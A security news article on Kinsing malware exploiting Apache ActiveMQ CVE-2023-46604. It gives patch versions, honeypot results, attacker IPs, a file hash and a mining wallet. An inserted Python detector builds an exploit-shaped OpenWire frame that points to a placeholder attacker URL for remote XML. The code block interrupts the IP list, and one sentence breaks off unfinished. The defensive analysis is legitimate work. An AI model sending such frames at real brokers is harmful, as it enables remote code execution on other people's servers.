Apache ActiveMQ Vulnerability Exploited by Kinsing to Attack Linux Servers
Threat actors have been actively targeting the Apache ActiveMQ vulnerability to gain unauthorized access to messaging systems, resulting in potential data breaches and system compromise.
Meanwhile, the Apache ActiveMQ vulnerability, tracked as "CVE-2023-46604", can also be exploited to disrupt communication, cause service outages, and deploy ransomware (HelloKitty) as well.
Cybersecurity researchers at Sekoia recently identified that the Kinsing malware actively exploited this Apache ActiveMQ vulnerability (CVE-2023-46604) to attack Linux servers.
Apache ActiveMQ Vulnerability Exploited
This vulnerability was disclosed on October 27, 2023; it is a critical vulnerability in the OpenWire module with a CVSS3 score of 9.8. The flaw allows unauthenticated attackers to execute code.
The flaw, rooted in deserialization validation lapses, particularly affects ExceptionResponseMarshaller. Attackers can exploit it by crafting a weaponized throwable class.
ClassPathXmlApplicationContext can also be manipulated through a weaponized XML file, granting code execution. Metasploit and similar PoCs leverage this flaw.
Patches were released on October 28, 2023, urging updates to the following versions:
- 5.15.16
- 5.16.7
- 5.17.6
- 5.18.3
If updating isn't possible, make sure to block OpenWire access from the Internet, as this mitigates the risk.
Researchers deployed honeypots globally running ActiveMQ v5.17.5. The hosts were monitored with the Sekoia Linux agent and Suricata IDS.
The honeypots have been active since 9 Nov 2023, and the first Kinsing intrusion was recorded on 11 Nov. Two to three Kinsing intrusions per day have been recorded since 12 Nov, and the attacks were carried out from the following two IP addresses:
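As an added example (not code from the Sekoia report or this article), the inspector below flags an OpenWire ExceptionResponse frame whose throwable field carries the ClassPathXmlApplicationContext class name, which is the shape of request a network sensor such as the Suricata deployment mentioned later would alert on, while letting an ordinary broker exception pass. The frame layout, the constructed sample frames and the placeholder URL are assumptions made for the example.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Assumed OpenWire framing: 4-byte big-endian length, then a 1-byte command type (31 = ExceptionResponse)
EXCEPTION_RESPONSE = 31
# Class name the exploit places in the throwable so ExceptionResponseMarshaller instantiates it
GADGET_CLASS = b"org.springframework.context.support.ClassPathXmlApplicationContext"


@dataclass
class Finding:
    class_name: str
    message: Optional[str]  # the "exception message", which carries the remote XML location


def _java_utf(s: bytes) -> bytes:
    """Encode like DataOutput.writeUTF: 2-byte big-endian length, then the bytes."""
    return struct.pack(">H", len(s)) + s


def _next_utf_string(buf: bytes) -> Optional[str]:
    # Loose encoding writes a 1-byte not-null flag before a string, tight encoding does not,
    # so try both offsets and accept the first plausible length-prefixed printable string.
    for off in (0, 1):
        if len(buf) < off + 2:
            continue
        n = struct.unpack(">H", buf[off:off + 2])[0]
        s = buf[off + 2:off + 2 + n]
        if n and len(s) == n and all(0x20 <= c < 0x7F for c in s):
            return s.decode("ascii")
    return None


def inspect_frame(frame: bytes) -> Optional[Finding]:
    """Return a Finding when an OpenWire frame carries the CVE-2023-46604 gadget class, else None."""
    if len(frame) < 5 or struct.unpack(">I", frame[:4])[0] != len(frame) - 4:
        return None  # truncated, or not an OpenWire frame at all
    if frame[4] != EXCEPTION_RESPONSE:
        return None
    idx = frame.find(GADGET_CLASS)
    if idx < 2 or frame[idx - 2:idx] != struct.pack(">H", len(GADGET_CLASS)):
        return None  # class name absent, or present but not as a writeUTF field
    return Finding(GADGET_CLASS.decode(), _next_utf_string(frame[idx + len(GADGET_CLASS):]))


def make_frame(class_name: bytes, message: bytes) -> bytes:
    """Constructed test frame (loose-encoding shape): fixed header fields, then the throwable strings."""
    body = bytes([EXCEPTION_RESPONSE]) + b"\x00\x00\x00\x01" + b"\x01" + b"\x00\x00\x00\x01"
    body += b"\x01" + b"\x01" + _java_utf(class_name) + b"\x01" + _java_utf(message)
    return struct.pack(">I", len(body)) + body


if __name__ == "__main__":
    # Constructed samples: a benign broker error, then a frame in the exploit's shape with a placeholder URL
    print(inspect_frame(make_frame(b"java.lang.SecurityException", b"User name or password is invalid.")))
    print(inspect_frame(make_frame(GADGET_CLASS, b"http://ATTACKER-PLACEHOLDER.example/poc.xml")))
```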
- 109.237.96[.]124
- 78.153.140[.]30
Actions Performed by Kinsing Malware
Here below, we have listed all the actions performed by the Kinsing malware:
- Rootkit
- Kills competitors
- Downloads and executes
- Sets up persistence
- Removes firewall rules
- Deletes competitors
- Sets up a crontab
Kinsing malware characteristics
Here below, we have listed the characteristics of the Kinsing malware:
- SHA256 hash: 787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c
- Size: 5.69 MBytes
- File: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
- Compiler: Go1.17.13
Capabilities
The malware code contains over 60 functions, and below we have listed a few of them:
- getActiveC2Url
- POST on /mu
- POST on /ki
- GET on /discover
- massscan
- redisBrute
The cryptominer that is deployed is XMRig, packed with UPX, with its configuration embedded. Decompressed, it reveals a Monero wallet (46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb) and a nanopool.org URL.
However, this wallet has been idle since Nov 2019. CTI reports link this wallet to Kinsing, but it's.
The numerous breaches highlight how important it is to apply security updates quickly and to keep strict control over legacy applications, particularly in dockerized services.
Source credit: cybersecuritynews.com